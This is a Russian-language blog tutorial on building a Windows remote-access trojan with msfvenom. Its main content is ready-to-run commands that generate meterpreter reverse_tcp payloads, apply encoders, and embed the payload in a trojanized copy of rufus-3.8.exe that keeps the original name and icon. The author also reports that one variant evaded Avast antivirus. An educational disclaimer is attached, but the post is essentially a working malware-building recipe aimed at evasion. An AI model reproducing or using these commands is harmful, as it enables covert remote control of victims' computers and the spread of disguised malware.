Приветствую всех читателей Дзена. Сегодня мы опять затронем тему создания вирусов. Хочется сразу сказать, что эта статья является основой для моей дальнейшей работы. Пусть вас не смущает то, что мы никак не скрываем вирус, этим мы займемся в дальнейшем. Здесь я просто показываю, как создать зловред, чтобы потом данную информацию не приходилось дублировать в будущем.
И да, я реально создал вирус удаленного доступа который не пропалил Avast. Не надо писать, что это кликбейт.
Ранее я уже выпускал статьи, где не только создавал, но и скрывал в различных формах наш вирус. Кому интересно вот они:
Взлом ПК при помощи PDF, docx или xlsx
Взлом Windows при помощи документа Word
Ваш компьютер могут взломать всего одной скопированной фразой
Просто повторять из раза в раз, как создать простой бэкдор не хочется, вот и решил вынести эту информацию отдельно. Также у меня уже есть первая часть, где мы создавали бэкдор для Windows 10.
Сегодня же наша цель создать вирус удаленного доступа, который впоследствии мы будем скрывать под различными обертками.
ПРЕДУПРЕЖДЕНИЕ!
Данная статья предоставляется лишь для ознакомления. Она не является побуждением к действиям, которые проделывает автор. Создано лишь в образовательных и развлекательных целях. Помните несанкционированный взлом чужих устройств является противоправным действием и карается по закону. Автор проделывает все действия лишь на собственном оборудовании и в собственной локальной сети.
Всё используемое ПО находится в открытом доступе и не запрещено на территории РФ.
Итак, для работы нам понадобится ОС Kali Linux. О том как её установить я рассказывал здесь, также там вы найдете видео инструкцию по установке.
Тем у кого Kali Linux уже установлен достаточно просто открыть терминал. Пользоваться мы будем Msfvenom. Я покажу несколько вариантов создания полезной нагрузки. Объясню по частям, что означает каждая из частей команды (на последнем варианте), а также приведу команды, которые понадобятся для того, чтобы управлять компьютером жертвы.
1 Вариант
Начнем с самого простого, а именно вот с такой команды:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.200.132 LPORT=4444 -a x64 -f exe -o forskeika1.exe
Ничего замудренного. В LHOST вы должны указать свой IP адрес, узнать его можно при помощи команды ifconfig (у меня это 192.168.200.132). Так как мы атакуем только свои компьютеры и только в локальной сети, я прописываю свой локальный IP. Созданный файл сохранится в той директории, в которой вы сейчас находитесь.
2 Вариант
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.200.132 -e x86/shikata_ga_nai -i 5 -b "\x00" -f exe -o virus.exe
Команда немного усовершенствована. Добавлено шифрование (-e x86/shikata_ga_nai) в несколько итераций, в данном случае их 5 ( -i 5).
Пример для другого типа шифрования:
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.132 -e cmd/powershell_base64 -i 10 -b "\x00" -f exe -o virus1.exe
Вы можете выбрать свой тип шифрования. Для просмотра доступных кодировщиков пропишите
msfvenom -l encoders
3 Вариант
Тут я задействую сторонний exe файл какой-либо программы, который нужно предварительно скачать и перед вводом команды перейти в папку, содержащий данный exe файл.
msfvenom --platform windows --arch x64 -x rufus-3.8.exe -k -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.132 -e cmd/powershell_base64 -i 10 -b "\x00" -f exe -o rufus-3.8.exe
Поясняю, что тут есть что.
- --platform windows - платформа Windows
- -x rufus-3.8.exe - файл, который мы заражаем
- -k - нужен для встраивания нагрузки
- -p windows/meterpreter/reverse_tcp - тип полезной нагрузки
- lhost=192.168.200.132 - ip компьютера атакующего (ваш IP)
- -e cmd/powershell_base64 - шифрование (оно и помогло не спалиться)
- -i 10 - количество итераций шифрования
- -f exe - формат файла
- -o rufus-3.8.exe - файл, который вы получите на выходе
На выходе вы получаете файл с такой же иконкой и названием как у оригинала, но только с вирусом удаленного доступа внутри.
Тестировать всё это буду на самой новой Win10 со всеми обновлениями. Вирус без шифрования и с шифрованием x86/shikata_ga_nai без проблем поймались антивирусом. А вот вирус с шифрованием cmd/powershell_base64 остался незамеченным. Avast "говорит", что с данным файлом всё в порядке. Вот это действительно сюрприз.
Я сделал запись с экрана, как я провожу сканирование, чтобы мне потом не писали в комментариях, что автор обманывает. Вот ссылка на эту запись. Хотя по-любому останутся те, кто не верит.
Интересно как долго он не будет палиться антивирусом. Хотя мне кажется, что антивирус всё-таки мог что-то заподозрить и отправить данный файл в лабораторию. Если он не будет палиться еще в течение нескольких суток, я сам отправлю его в лабораторию с указанием, что это вирус. Я же всё-таки не занимаюсь взломом, а наоборот, хочу защитить пользователей.